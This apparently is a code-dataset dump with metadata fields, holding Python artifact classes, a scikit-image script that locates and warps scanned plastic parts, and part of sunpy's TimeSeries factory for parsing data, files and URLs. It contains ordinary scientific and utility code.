def __init__(self, name):
self.name = name
def __str__(self):
return 'Artifact'
#
# def _get_str_name(obj):
# return obj if isinstance(obj, six.string_types) else obj.name
class File(Artifact):
def __init__(self, name, abs_path):
super(File, self).__init__(name)
split_path = abs_path.split('/')
self.path = '/'.join(split_path[:-1])
self.file = split_path[-1]
@property
def file_path(self):
return self.path + '/' + self.file
@property
def format(self):
pass
def __str__(self):
return 'File'
class DockerImage(Artifact):
def __init__(self, attr):
super(DockerImage, self).__init__('')
self.name, self.tag = attr.split(':') if ':' in attr \
else (attr, 'latest')
@property
def format(self):
return '{}:{}'.format(self.name, self.tag)
def __str__(self):
return 'DockerImage'
class DockerImageExecutable(DockerImage):
def __str__(self):
return 'DockerImageExecutable'
class Dockerfile(Artifact):
def __init__(self, attr, dockerfile):
super(Dockerfile, self).__init__('')
self.name, self.tag = attr.split(':') if ':' in attr \
else (attr, 'latest')
self.dockerfile = dockerfile
@property
def format(self):
return '{}:{}'.format(self.name, self.tag)
def __str__(self):
return 'Dockerfile'
class DockerfileExecutable(Dockerfile):
def __str__(self):
return 'DockerfileExecutable'
|
en
| 0.153103
|
Artifacts module # # def _get_str_name(obj): # return obj if isinstance(obj, six.string_types) else obj.name
| 2.520082
| 3
|
django_town/social/management/commands/__init__.py
|
uptown/django-town
| 0
|
6628544
|
__author__ = 'uptown'
|
__author__ = 'uptown'
|
none
| 1
| 0.973663
| 1
|
|
student-projects/fall-2020/OST-Imaging-and-Matching-Plastic/mvp/ImportScanCreateImage.py
|
UCBerkeley-SCET/DataX-Berkeley
| 28
|
6628545
|
"""
@author: <NAME>
"""
###########################################################################
## Import the necessary functions
###########################################################################
import sys
sys.path.append('/usr/local/lib/python2.7/site-packages')
import numpy as np
import matplotlib.pyplot as plt
import skimage.io as io
import skimage
from skimage import feature
from skimage.color import rgb2gray
from skimage.transform import rescale
from skimage import transform as tf
import skimage.transform.hough_transform as ht
###########################################################################
## Definition of some helper functions
###########################################################################
#INPUT: two points
#OUTPUT: coefficients A, B, C of line equation that goes through the two input points, A1 * x + B1 * y = C1
def line(p1, p2):
A = (p1[1] - p2[1])
B = (p2[0] - p1[0])
C = (p1[0]*p2[1] - p2[0]*p1[1])
return A, B, -C
#Finds intersection point (if any) of two lines provided by coefs.
def intersection(L1, L2, x_size, y_size):
D = L1[0] * L2[1] - L1[1] * L2[0]
Dx = L1[2] * L2[1] - L1[1] * L2[2]
Dy = L1[0] * L2[2] - L1[2] * L2[0]
if D != 0:
x = Dx / D
y = Dy / D
if x<0 or x>x_size or y<0 or y>y_size:
x=0
y=0
return x,y
else:
return False
###########################################################################
## Start of main program
###########################################################################
# We basically want to import the scanner image find the exact location of the
# plastic part on the image. Once we know the location, we want to create a
# new image (600*800) that only contains the plastic part
###########################################################################
if __name__ == "__main__":
#######################################################################
## Preprocess image
#######################################################################
# Import the scanner image, convert the image from color to grayscale
# since it is much easier to work with and remove the border of the image
# (A rgb image consists of 3 layers, one for red green for blue.
# 100mio numbers in our case. A grayscale image has only one layer. Each
# pixel can either be bright (255), black (0) or something in between.)
# Change the path to a scanner image (Sampledata\Scanned_images in our
# shared google folder)
path=r'C:\Users\tobias.grab\switchdrive\Schule\datax\projekt\input\20200916151652_001.jpg'
im_color=io.imread(path)
original=rgb2gray(im_color)
bordersize=0.02;
original=original[int(bordersize*original.shape[0]):int((1-bordersize)*original.shape[0]),
int(bordersize*original.shape[1]):int((1-bordersize)*original.shape[1])]
print("original shape:", original.shape)
print("original dtype:", original.dtype)
# Rescale the image for computational reasons. Scaling both sides by
# factor of five leads to 25 times less numbers to work with
# (about 1.3 million insead of 33 million)
scaling_factor=5
im=rescale(original,1/scaling_factor, multichannel=False)
print("rescaled size", im.shape)
y_size=im.shape[0]
x_size=im.shape[1]
# PREPROCESSING
# Create a binary image and remove the noise from the image (Some white
# spots where the plasic part is) using a morphological opening.
# Simplified a opening replaces the value of each pixel first by the minimum
# value in its neighborhood (Defined by the kernel). In a second step the
# value of each pixel gets replaced by the maximum in its neighborhood.
# That leads to the result, that white spots smaller than the kernel
# will be black after the opening.
im=im>0.9
plt.figure()
plt.imshow(im,vmin=0, vmax=1,cmap="gray")
kernel = np.ones((10,10))==1
im=skimage.morphology.binary_opening(im,kernel)
plt.figure()
plt.imshow(im, vmin=0, vmax=1,cmap="gray")
# Filter the edges (Looking for the edges of the plastic part)
# Finding edges of an image can basically be done by calculating the
# gradient of the image (Using a 2D convolution) since edges are usually
# strong changes in illumination (so have a high gradient)
# The canny edge detector is a more sophisticaed way to do it, but the
# principle is the same
canny_sigma=1
plt.figure()
imedges=feature.canny(im,sigma=canny_sigma)
plt.imshow(imedges)
#######################################################################
## Find the corners of the plastic parts (Intersection of the edge lines)
#######################################################################
# First we have to a representation of the edges, which are in our case
# the four most prominant lines in the image. Since we want to do some
# calculations with it, we need to get formulas for those lines.
# In order to get those formulas, we use a hough transformation
# A line usually gets represented by the equation y=a*x+b, however the
# problem there is that a vertical line can not be represented. A more
# robust representation is a representation by a angle and a distance (from zero)
# With a hough transformation we transform our image into the hough space.
# The hough space is a representation of all possible lines, one dimension
# is the distance, the other the angle. Every point in the hough space
# is a line in the image. The hough algorithm is basically a voting algorithm.
# For every point in the hough space, we calculate corresponding line in
# our original image the line and count the number of points that are
# on that line. The points with the most votes (the max value) in the hough space
# correspond to the most prominant line.
# The same principle can be used for circle detection, square detection and
# so on. You only need to be able to define with hough space with only a few
# variables (e.g. the radius, and the coordinates of the middle point for
# a circle ==> the hough space wouldn't be 2 dimensional anymore)
H,angles,distances = ht.hough_line(imedges)
# The probelm is that the same line can be representet by a distance and thetha
# as well as -distance and -theta... so we set half of the hough space to zero
H[:int(H.shape[0]/2),:int(H.shape[1]/2)]=0
#Find four most dominant points in the hough space, once a dominant point is
#detected, set points near it to zero
d=[]
theta=[]
for i in range(0,4):
(maxr, maxc) = np.unravel_index(np.argmax(H), H.shape)
print(H.dtype)
min_del_dist=maxr-20
if min_del_dist<=0:
min_del_dist=0;
min_del_angle=maxc-5
if min_del_angle<=0:
min_del_angle=0;
H[(min_del_dist):(maxr+20),(min_del_angle):(maxc+5)]=0;
d.append(distances[maxr])
theta.append(angles[maxc])
print(d[i],theta[i])
d=np.array([d])
theta=np.array([theta])
#D and theta are the distance and angle representation of the four most
#prominant lines
########################################################################
## We got a represenation of the lines now, time to plot everything
########################################################################
#Plot of the hough space
fig,(ax0,ax1) = plt.subplots(ncols=2, nrows=1, figsize=(15,8))
ax0.imshow(imedges, cmap="gray")
Himage = ax1.imshow(H,extent=(angles[0],angles[-1],distances[0],distances[-1]),origin="lower",aspect="auto")
ax1.set(xlabel="angle [rad]", ylabel="d [pixels]", title="H: Hough space accumulator");
plt.colorbar(Himage)
ax1.plot(theta, d, "ws", fillstyle="none")
#Plot of the image with the most prominant lines
p0=np.zeros((2,4))
p2=np.zeros((2,4))
for i in range(0,4):
#In order to draw the line, we need two points on it
p1 = np.array([d[0,i]*np.cos(theta[0,i]), d[0,i]*np.sin(theta[0,i])])
linedir = np.array([np.cos(theta[0,i]+np.pi/2), np.sin(theta[0,i]+np.pi/2)])
p0[:,i] = p1 - linedir * 1000
p2[:,i] = p1 + linedir * 1000
# We now draw a line through p0 and p2, without rescaling the axes.
ax0.plot([p0[0],p2[0]],[p0[1],p2[1]], scalex=False, scaley=False)
########################################################################
## We now want find the corners, which are the intersections of the lines
########################################################################
# We first use our two points (which we made for the plot)
# to calculate the a*x+b representation using a helper function
lines=[]
for i in range(0,4):
lines.append(line(p0[:,i].T, p2[:,i].T))
#returns A, B and C of A1 * x + B1 * y = C1
#Since we only have four lines, we can calculate all possible combination of
#intersections. If we have parallel lines, there is no intersection
R=[]
R.append(np.array([intersection(lines[0],lines[1], x_size, y_size)]))
R.append(np.array([intersection(lines[0],lines[2], x_size, y_size)]))
R.append(np.array([intersection(lines[0],lines[3], x_size, y_size)]))
R.append(np.array([intersection(lines[1],lines[2], x_size, y_size)]))
R.append(np.array([intersection(lines[1],lines[3], x_size, y_size)]))
R.append(np.array([intersection(lines[2],lines[3], x_size, y_size)]))
#Delete if no intersection
for i in reversed(range(0,len(R))):
if np.sum(R[i])==0:
del R[i]
#Plot intersection points
for i in range(0,4):
ax0.plot(R[i][0,0],R[i][0,1],"ws", fillstyle="none", scalex=False, scaley=False)
#######################################################################
## We finally use the function transform library from skimage
## in order to cut out and warp the image of the plastic part from our
## original (high resoultion) image using the calculated corner points
##
## The skimage.transform.ProjectiveTransform.estimate and the
## skimage.transform.warp functions are very confusing, so I am just glad
## that it works
#######################################################################
dst_corners=np.squeeze(np.array([R[0],R[1],R[2],R[3]]))
dst_sum=np.array([np.sum(dst_corners,axis=1)]).T
dst_arr=np.concatenate((dst_corners, dst_sum),axis=1)
sortedArr = dst_arr[np.argsort(dst_arr[:, 2])]*scaling_factor
if sortedArr[1,0]<sortedArr[2,0]:
src = np.array([[0, 0], [0, 300*2], [400*2, 0],[400*2, 300*2]])
else:
src = np.array([[0, 0], [400*2, 0], [0, 300*2],[400*2, 300*2]])
dst = sortedArr[:,:2]
tform3 = tf.ProjectiveTransform()
tform3.estimate(src, dst)
######################################################################
## We finally have our plastic part image in the variable "warped",
## so lets plot it in order to check
######################################################################
warped = tf.warp(original, tform3, output_shape=(300*2,400*2))
plt.figure()
plt.imshow(warped,cmap='gray')
# io.imsave(r'C:\Users\tobias.grab\switchdrive\Schule\datax\projekt\test\Testimg1.jpg',warped)
|
"""
@author: <NAME>
"""
###########################################################################
## Import the necessary functions
###########################################################################
import sys
sys.path.append('/usr/local/lib/python2.7/site-packages')
import numpy as np
import matplotlib.pyplot as plt
import skimage.io as io
import skimage
from skimage import feature
from skimage.color import rgb2gray
from skimage.transform import rescale
from skimage import transform as tf
import skimage.transform.hough_transform as ht
###########################################################################
## Definition of some helper functions
###########################################################################
#INPUT: two points
#OUTPUT: coefficients A, B, C of line equation that goes through the two input points, A1 * x + B1 * y = C1
def line(p1, p2):
A = (p1[1] - p2[1])
B = (p2[0] - p1[0])
C = (p1[0]*p2[1] - p2[0]*p1[1])
return A, B, -C
#Finds intersection point (if any) of two lines provided by coefs.
def intersection(L1, L2, x_size, y_size):
D = L1[0] * L2[1] - L1[1] * L2[0]
Dx = L1[2] * L2[1] - L1[1] * L2[2]
Dy = L1[0] * L2[2] - L1[2] * L2[0]
if D != 0:
x = Dx / D
y = Dy / D
if x<0 or x>x_size or y<0 or y>y_size:
x=0
y=0
return x,y
else:
return False
###########################################################################
## Start of main program
###########################################################################
# We basically want to import the scanner image find the exact location of the
# plastic part on the image. Once we know the location, we want to create a
# new image (600*800) that only contains the plastic part
###########################################################################
if __name__ == "__main__":
#######################################################################
## Preprocess image
#######################################################################
# Import the scanner image, convert the image from color to grayscale
# since it is much easier to work with and remove the border of the image
# (A rgb image consists of 3 layers, one for red green for blue.
# 100mio numbers in our case. A grayscale image has only one layer. Each
# pixel can either be bright (255), black (0) or something in between.)
# Change the path to a scanner image (Sampledata\Scanned_images in our
# shared google folder)
path=r'C:\Users\tobias.grab\switchdrive\Schule\datax\projekt\input\20200916151652_001.jpg'
im_color=io.imread(path)
original=rgb2gray(im_color)
bordersize=0.02;
original=original[int(bordersize*original.shape[0]):int((1-bordersize)*original.shape[0]),
int(bordersize*original.shape[1]):int((1-bordersize)*original.shape[1])]
print("original shape:", original.shape)
print("original dtype:", original.dtype)
# Rescale the image for computational reasons. Scaling both sides by
# factor of five leads to 25 times less numbers to work with
# (about 1.3 million insead of 33 million)
scaling_factor=5
im=rescale(original,1/scaling_factor, multichannel=False)
print("rescaled size", im.shape)
y_size=im.shape[0]
x_size=im.shape[1]
# PREPROCESSING
# Create a binary image and remove the noise from the image (Some white
# spots where the plasic part is) using a morphological opening.
# Simplified a opening replaces the value of each pixel first by the minimum
# value in its neighborhood (Defined by the kernel). In a second step the
# value of each pixel gets replaced by the maximum in its neighborhood.
# That leads to the result, that white spots smaller than the kernel
# will be black after the opening.
im=im>0.9
plt.figure()
plt.imshow(im,vmin=0, vmax=1,cmap="gray")
kernel = np.ones((10,10))==1
im=skimage.morphology.binary_opening(im,kernel)
plt.figure()
plt.imshow(im, vmin=0, vmax=1,cmap="gray")
# Filter the edges (Looking for the edges of the plastic part)
# Finding edges of an image can basically be done by calculating the
# gradient of the image (Using a 2D convolution) since edges are usually
# strong changes in illumination (so have a high gradient)
# The canny edge detector is a more sophisticaed way to do it, but the
# principle is the same
canny_sigma=1
plt.figure()
imedges=feature.canny(im,sigma=canny_sigma)
plt.imshow(imedges)
#######################################################################
## Find the corners of the plastic parts (Intersection of the edge lines)
#######################################################################
# First we have to a representation of the edges, which are in our case
# the four most prominant lines in the image. Since we want to do some
# calculations with it, we need to get formulas for those lines.
# In order to get those formulas, we use a hough transformation
# A line usually gets represented by the equation y=a*x+b, however the
# problem there is that a vertical line can not be represented. A more
# robust representation is a representation by a angle and a distance (from zero)
# With a hough transformation we transform our image into the hough space.
# The hough space is a representation of all possible lines, one dimension
# is the distance, the other the angle. Every point in the hough space
# is a line in the image. The hough algorithm is basically a voting algorithm.
# For every point in the hough space, we calculate corresponding line in
# our original image the line and count the number of points that are
# on that line. The points with the most votes (the max value) in the hough space
# correspond to the most prominant line.
# The same principle can be used for circle detection, square detection and
# so on. You only need to be able to define with hough space with only a few
# variables (e.g. the radius, and the coordinates of the middle point for
# a circle ==> the hough space wouldn't be 2 dimensional anymore)
H,angles,distances = ht.hough_line(imedges)
# The probelm is that the same line can be representet by a distance and thetha
# as well as -distance and -theta... so we set half of the hough space to zero
H[:int(H.shape[0]/2),:int(H.shape[1]/2)]=0
#Find four most dominant points in the hough space, once a dominant point is
#detected, set points near it to zero
d=[]
theta=[]
for i in range(0,4):
(maxr, maxc) = np.unravel_index(np.argmax(H), H.shape)
print(H.dtype)
min_del_dist=maxr-20
if min_del_dist<=0:
min_del_dist=0;
min_del_angle=maxc-5
if min_del_angle<=0:
min_del_angle=0;
H[(min_del_dist):(maxr+20),(min_del_angle):(maxc+5)]=0;
d.append(distances[maxr])
theta.append(angles[maxc])
print(d[i],theta[i])
d=np.array([d])
theta=np.array([theta])
#D and theta are the distance and angle representation of the four most
#prominant lines
########################################################################
## We got a represenation of the lines now, time to plot everything
########################################################################
#Plot of the hough space
fig,(ax0,ax1) = plt.subplots(ncols=2, nrows=1, figsize=(15,8))
ax0.imshow(imedges, cmap="gray")
Himage = ax1.imshow(H,extent=(angles[0],angles[-1],distances[0],distances[-1]),origin="lower",aspect="auto")
ax1.set(xlabel="angle [rad]", ylabel="d [pixels]", title="H: Hough space accumulator");
plt.colorbar(Himage)
ax1.plot(theta, d, "ws", fillstyle="none")
#Plot of the image with the most prominant lines
p0=np.zeros((2,4))
p2=np.zeros((2,4))
for i in range(0,4):
#In order to draw the line, we need two points on it
p1 = np.array([d[0,i]*np.cos(theta[0,i]), d[0,i]*np.sin(theta[0,i])])
linedir = np.array([np.cos(theta[0,i]+np.pi/2), np.sin(theta[0,i]+np.pi/2)])
p0[:,i] = p1 - linedir * 1000
p2[:,i] = p1 + linedir * 1000
# We now draw a line through p0 and p2, without rescaling the axes.
ax0.plot([p0[0],p2[0]],[p0[1],p2[1]], scalex=False, scaley=False)
########################################################################
## We now want find the corners, which are the intersections of the lines
########################################################################
# We first use our two points (which we made for the plot)
# to calculate the a*x+b representation using a helper function
lines=[]
for i in range(0,4):
lines.append(line(p0[:,i].T, p2[:,i].T))
#returns A, B and C of A1 * x + B1 * y = C1
#Since we only have four lines, we can calculate all possible combination of
#intersections. If we have parallel lines, there is no intersection
R=[]
R.append(np.array([intersection(lines[0],lines[1], x_size, y_size)]))
R.append(np.array([intersection(lines[0],lines[2], x_size, y_size)]))
R.append(np.array([intersection(lines[0],lines[3], x_size, y_size)]))
R.append(np.array([intersection(lines[1],lines[2], x_size, y_size)]))
R.append(np.array([intersection(lines[1],lines[3], x_size, y_size)]))
R.append(np.array([intersection(lines[2],lines[3], x_size, y_size)]))
#Delete if no intersection
for i in reversed(range(0,len(R))):
if np.sum(R[i])==0:
del R[i]
#Plot intersection points
for i in range(0,4):
ax0.plot(R[i][0,0],R[i][0,1],"ws", fillstyle="none", scalex=False, scaley=False)
#######################################################################
## We finally use the function transform library from skimage
## in order to cut out and warp the image of the plastic part from our
## original (high resoultion) image using the calculated corner points
##
## The skimage.transform.ProjectiveTransform.estimate and the
## skimage.transform.warp functions are very confusing, so I am just glad
## that it works
#######################################################################
dst_corners=np.squeeze(np.array([R[0],R[1],R[2],R[3]]))
dst_sum=np.array([np.sum(dst_corners,axis=1)]).T
dst_arr=np.concatenate((dst_corners, dst_sum),axis=1)
sortedArr = dst_arr[np.argsort(dst_arr[:, 2])]*scaling_factor
if sortedArr[1,0]<sortedArr[2,0]:
src = np.array([[0, 0], [0, 300*2], [400*2, 0],[400*2, 300*2]])
else:
src = np.array([[0, 0], [400*2, 0], [0, 300*2],[400*2, 300*2]])
dst = sortedArr[:,:2]
tform3 = tf.ProjectiveTransform()
tform3.estimate(src, dst)
######################################################################
## We finally have our plastic part image in the variable "warped",
## so lets plot it in order to check
######################################################################
warped = tf.warp(original, tform3, output_shape=(300*2,400*2))
plt.figure()
plt.imshow(warped,cmap='gray')
# io.imsave(r'C:\Users\tobias.grab\switchdrive\Schule\datax\projekt\test\Testimg1.jpg',warped)
|
en
| 0.65659
|
@author: <NAME> ########################################################################### ## Import the necessary functions ########################################################################### ########################################################################### ## Definition of some helper functions ########################################################################### #INPUT: two points #OUTPUT: coefficients A, B, C of line equation that goes through the two input points, A1 * x + B1 * y = C1 #Finds intersection point (if any) of two lines provided by coefs. ########################################################################### ## Start of main program ########################################################################### # We basically want to import the scanner image find the exact location of the # plastic part on the image. Once we know the location, we want to create a # new image (600*800) that only contains the plastic part ########################################################################### ####################################################################### ## Preprocess image ####################################################################### # Import the scanner image, convert the image from color to grayscale # since it is much easier to work with and remove the border of the image # (A rgb image consists of 3 layers, one for red green for blue. # 100mio numbers in our case. A grayscale image has only one layer. Each # pixel can either be bright (255), black (0) or something in between.) # Change the path to a scanner image (Sampledata\Scanned_images in our # shared google folder) # Rescale the image for computational reasons. Scaling both sides by # factor of five leads to 25 times less numbers to work with # (about 1.3 million insead of 33 million) # PREPROCESSING # Create a binary image and remove the noise from the image (Some white # spots where the plasic part is) using a morphological opening. # Simplified a opening replaces the value of each pixel first by the minimum # value in its neighborhood (Defined by the kernel). In a second step the # value of each pixel gets replaced by the maximum in its neighborhood. # That leads to the result, that white spots smaller than the kernel # will be black after the opening. # Filter the edges (Looking for the edges of the plastic part) # Finding edges of an image can basically be done by calculating the # gradient of the image (Using a 2D convolution) since edges are usually # strong changes in illumination (so have a high gradient) # The canny edge detector is a more sophisticaed way to do it, but the # principle is the same ####################################################################### ## Find the corners of the plastic parts (Intersection of the edge lines) ####################################################################### # First we have to a representation of the edges, which are in our case # the four most prominant lines in the image. Since we want to do some # calculations with it, we need to get formulas for those lines. # In order to get those formulas, we use a hough transformation # A line usually gets represented by the equation y=a*x+b, however the # problem there is that a vertical line can not be represented. A more # robust representation is a representation by a angle and a distance (from zero) # With a hough transformation we transform our image into the hough space. # The hough space is a representation of all possible lines, one dimension # is the distance, the other the angle. Every point in the hough space # is a line in the image. The hough algorithm is basically a voting algorithm. # For every point in the hough space, we calculate corresponding line in # our original image the line and count the number of points that are # on that line. The points with the most votes (the max value) in the hough space # correspond to the most prominant line. # The same principle can be used for circle detection, square detection and # so on. You only need to be able to define with hough space with only a few # variables (e.g. the radius, and the coordinates of the middle point for # a circle ==> the hough space wouldn't be 2 dimensional anymore) # The probelm is that the same line can be representet by a distance and thetha # as well as -distance and -theta... so we set half of the hough space to zero #Find four most dominant points in the hough space, once a dominant point is #detected, set points near it to zero #D and theta are the distance and angle representation of the four most #prominant lines ######################################################################## ## We got a represenation of the lines now, time to plot everything ######################################################################## #Plot of the hough space #Plot of the image with the most prominant lines #In order to draw the line, we need two points on it # We now draw a line through p0 and p2, without rescaling the axes. ######################################################################## ## We now want find the corners, which are the intersections of the lines ######################################################################## # We first use our two points (which we made for the plot) # to calculate the a*x+b representation using a helper function #returns A, B and C of A1 * x + B1 * y = C1 #Since we only have four lines, we can calculate all possible combination of #intersections. If we have parallel lines, there is no intersection #Delete if no intersection #Plot intersection points ####################################################################### ## We finally use the function transform library from skimage ## in order to cut out and warp the image of the plastic part from our ## original (high resoultion) image using the calculated corner points ## ## The skimage.transform.ProjectiveTransform.estimate and the ## skimage.transform.warp functions are very confusing, so I am just glad ## that it works ####################################################################### ###################################################################### ## We finally have our plastic part image in the variable "warped", ## so lets plot it in order to check ###################################################################### # io.imsave(r'C:\Users\tobias.grab\switchdrive\Schule\datax\projekt\test\Testimg1.jpg',warped)
| 2.366281
| 2
|
sunpy/timeseries/timeseries_factory.py
|
ShubhamPandey28/sunpy
| 0
|
6628546
|
<gh_stars>0
"""
This module provies the `~sunpy.timeseries.TimeSeriesFactory` class.
"""
import os
import copy
import glob
import warnings
from collections import OrderedDict
from urllib.request import urlopen
import numpy as np
import pandas as pd
import astropy
import astropy.io.fits
import astropy.units as u
from astropy.table import Table
from astropy.time import Time
import sunpy
from sunpy.io.file_tools import UnrecognizedFileTypeError, read_file
from sunpy.io.fits import HDPair
from sunpy.io.header import FileHeader
from sunpy.timeseries.timeseriesbase import GenericTimeSeries
from sunpy.util import expand_list
from sunpy.util.config import get_and_create_download_dir
from sunpy.util.datatype_factory_base import (BasicRegistrationFactory, MultipleMatchError,
NoMatchError, ValidationFunctionError)
from sunpy.util.metadata import MetaDict
from sunpy.util.net import download_file
__all__ = ['TimeSeries', 'TimeSeriesFactory', 'NoTimeSeriesFound',
'InvalidTimeSeriesInput', 'InvalidTimeSeriesType']
class TimeSeriesFactory(BasicRegistrationFactory):
"""
TimeSeries(*args, **kwargs)
TimeSeries factory class, used to create a variety of `~sunpy.timeseries.TimeSeries` objects.
Valid timeseries types are specified by registering them with the factory.
Parameters
----------
source : `str`, optional
A string to select the observational source of the data, currently
necessary to define how files should be read for all instruments.
concatenate : `bool`, optional
Defaults to `False`.
If set, combine any resulting list of TimeSeries objects into a single
TimeSeries, using successive concatenate methods.
Examples
--------
>>> import sunpy.timeseries
>>> import sunpy.data.sample # doctest: +REMOTE_DATA
>>> my_timeseries = sunpy.timeseries.TimeSeries(sunpy.data.sample.GOES_XRS_TIMESERIES) # doctest: +REMOTE_DATA
The SunPy TimeSeries factory accepts a wide variety of inputs for creating timeseries
* Preloaded tuples of (data, header) pairs or (data, header, units)
>>> my_timeseries = sunpy.timeseries.TimeSeries((data, header)) # doctest: +SKIP
Headers and units must be either a `dict`, `~collections.OrderedDict` or `~sunpy.util.metadata.MetaDict`.
* data, header pairs, or data, header units triples, not in tuples
>>> my_timeseries = sunpy.timeseries.TimeSeries(data, header) # doctest: +SKIP
>>> my_timeseries = sunpy.timeseries.TimeSeries(data, header, units) # doctest: +SKIP
* File names for files understood by `sunpy.io` and those not
>>> my_timeseries = sunpy.timeseries.TimeSeries('filename.fits') # doctest: +SKIP
>>> my_timeseries = sunpy.timeseries.TimeSeries('filename.fits', source='lyra') # doctest: +SKIP
* Multiple files can be combined into one TimeSeries, as long as they are the same source
>>> my_timeseries = sunpy.timeseries.TimeSeries(['goesfile1.fits', 'goesfile2.fits'],
... concatenate=True) # doctest: +SKIP
* All fits files in a directory by giving a directory
>>> my_timeseries = sunpy.timeseries.TimeSeries('local_dir/sub_dir') # doctest: +SKIP
* Some regex globs
>>> my_timeseries = sunpy.timeseries.TimeSeries('eit_*.fits') # doctest: +SKIP
* URLs
>>> my_timeseries = sunpy.timeseries.TimeSeries(url) # doctest: +SKIP
* Lists of any of the above
>>> my_timeseries = sunpy.timeseries.TimeSeries(['file1.fits', 'file2.fits',
... 'file3.fits', 'directory1/']) # doctest: +SKIP
* Any mixture of the above not in a list
>>> my_timeseries = sunpy.timeseries.TimeSeries((data, header), data2, header2,
... 'file1.fits', url, 'eit_*.fits') # doctest: +SKIP
"""
@staticmethod
def _read_file(fname, **kwargs):
"""
Reading a file with `sunpy.io` for automatic source detection.
Parameters
----------
fname : `str`
The file path to parse.
Returns
-------
parsed : `bool`
`True` if file has been read.
pairs : `list` or `str`
List of ``(data, header)`` pairs if ``parsed`` is `True`, ``fname`` if ``parsed`` is `False`.
`False` if the file is not supported or incorrect.
"""
if 'source' not in kwargs.keys() or not kwargs['source']:
try:
pairs = read_file(fname, **kwargs)
new_pairs = []
for pair in pairs:
filedata, filemeta = pair
if isinstance(filemeta, FileHeader):
data = filedata
meta = MetaDict(filemeta)
new_pairs.append(HDPair(data, meta))
return True, new_pairs
except UnrecognizedFileTypeError:
return False, fname
else:
return False, fname
@staticmethod
def _validate_meta(meta):
"""
Validate a meta argument for use as metadata.
Currently only validates by class.
"""
if isinstance(meta, astropy.io.fits.header.Header):
return True
elif isinstance(meta, sunpy.io.header.FileHeader):
return True
elif isinstance(meta, dict):
return True
else:
return False
@staticmethod
def _validate_units(units):
"""
Validates the astropy unit-information associated with a
`~sunpy.timeseries.TimeSeries`.
Should be a dictionary of some form (but not
`sunpy.util.metadict.MetaDict`) with only `astropy.units` for
values.
"""
warnings.simplefilter('always', Warning)
result = True
# It must be a dictionary
if not isinstance(units, dict) or isinstance(units, MetaDict):
return False
for key in units:
if not isinstance(units[key], u.UnitBase):
# If this is not a unit then this can't be a valid units dict.
return False
# Passed all the tests
return result
@staticmethod
def _from_table(t):
"""
Extract the data, metadata and units from an astropy table for use in
constructing a `~sunpy.timeseries.TimeSeries`.
Parameters
----------
t: `~astropy.table.Table`
The input table. The datetime column must be the first column or the (single) primary key index.
"""
table = copy.deepcopy(t)
# Default the time index to the first column
index_name = table.colnames[0]
# Check if another column is defined as the index/primary_key
if table.primary_key:
# Check there is only one primary_key/index column
if len(table.primary_key) == 1:
table.primary_key[0]
else:
raise ValueError("Invalid input Table, TimeSeries doesn't support conversion"
" of tables with more then one index column.")
# Extract, convert and remove the index column from the input table
index = table[index_name]
# Convert if the index is given as an astropy Time object
if isinstance(index, Time):
index = index.datetime
index = pd.to_datetime(index)
table.remove_column(index_name)
# Extract the column values from the table
data = {}
units = {}
for colname in table.colnames:
data[colname] = table[colname]
units[colname] = table[colname].unit
# Create a dataframe with this and return
df = pd.DataFrame(data=data, index=index)
return df, MetaDict(table.meta), units
def _parse_args(self, *args, **kwargs):
"""
Parses an `args` list for data-header pairs. `args` can contain any mixture of the following
entries:
* tuples of (data, header, unit) (1)
* data, header not in a tuple (1)
* filename, which will be read
* directory, from which all files will be read
* glob, from which all files will be read
* url, which will be downloaded and read
* lists containing any of the above.
(1) header/unit are optional and in either order, but data should be the first entry in each group.
Examples
--------
self._parse_args(data, header,
(data, header),
['file1', 'file2', 'file3'],
'file4',
'directory1',
'*.fits')
"""
data_header_unit_tuples = list()
data_header_pairs = list()
already_timeseries = list()
filepaths = list()
# Account for nested lists of items. Simply outputs a single list of
# items, nested lists are expanded to element level.
args = expand_list(args)
# For each of the arguments, handle each of the cases
i = 0
while i < len(args):
arg = args[i]
# Data-header pair in a tuple
if (isinstance(arg, (np.ndarray, Table, pd.DataFrame))):
# and self._validate_meta(args[i+1])):
# Assume a Pandas Dataframe is given
data = arg
units = OrderedDict()
meta = MetaDict()
# Convert the data argument into a Pandas DataFrame if needed.
if isinstance(data, Table):
# We have an Astropy Table:
data, meta, units = self._from_table(data)
elif isinstance(data, np.ndarray):
# We have a numpy ndarray. We assume the first column is a dt index
data = pd.DataFrame(data=data[:, 1:], index=Time(data[:, 0]))
# If there are 1 or 2 more arguments:
for _ in range(2):
if (len(args) > i+1):
# If that next argument isn't data but is metaddata or units:
if not isinstance(args[i+1], (np.ndarray, Table, pd.DataFrame)):
if self._validate_units(args[i+1]):
units.update(args[i+1])
i += 1 # an extra increment to account for the units
elif self._validate_meta(args[i+1]):
# if we have an astropy.io FITS header then convert
# to preserve multi-line comments
if isinstance(args[i+1], astropy.io.fits.header.Header):
args[i+1] = MetaDict(sunpy.io.header.FileHeader(args[i+1]))
meta.update(args[i+1])
i += 1 # an extra increment to account for the meta
# Add a 3-tuple for this TimeSeries.
data_header_unit_tuples.append((data, meta, units))
# Filepath
elif (isinstance(arg, str) and
os.path.isfile(os.path.expanduser(arg))):
path = os.path.expanduser(arg)
result = self._read_file(path, **kwargs)
data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths, result)
# Directory
elif (isinstance(arg, str) and
os.path.isdir(os.path.expanduser(arg))):
path = os.path.expanduser(arg)
files = [os.path.join(path, elem) for elem in os.listdir(path)]
for afile in files:
# returns a boolean telling us if it were read and either a
# tuple or the original filepath for reading by a source
result = self._read_file(afile, **kwargs)
data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths,
result)
# Glob
elif isinstance(arg, str) and '*' in arg:
files = glob.glob(os.path.expanduser(arg))
for afile in files:
# returns a boolean telling us if it were read and either a
# tuple or the original filepath for reading by a source
result = self._read_file(afile, **kwargs)
data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths,
result)
# Already a TimeSeries
elif isinstance(arg, GenericTimeSeries):
already_timeseries.append(arg)
# A URL
elif (isinstance(arg, str) and
_is_url(arg)):
url = arg
path = download_file(url, get_and_create_download_dir())
result = self._read_file(path, **kwargs)
data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths, result)
else:
raise NoMatchError("File not found or invalid input")
i += 1
# TODO:
# In the end, if there are already TimeSeries it should be put in the
# same order as the input, currently they are not.
return data_header_unit_tuples, data_header_pairs, already_timeseries, filepaths
def __call__(self, *args, silence_errors=False, **kwargs):
"""
Method for running the factory. Takes arbitrary arguments and keyword
arguments and passes them to a sequence of pre-registered types to
determine which is the correct `~sunpy.timeseries.TimeSeries` source
type to build.
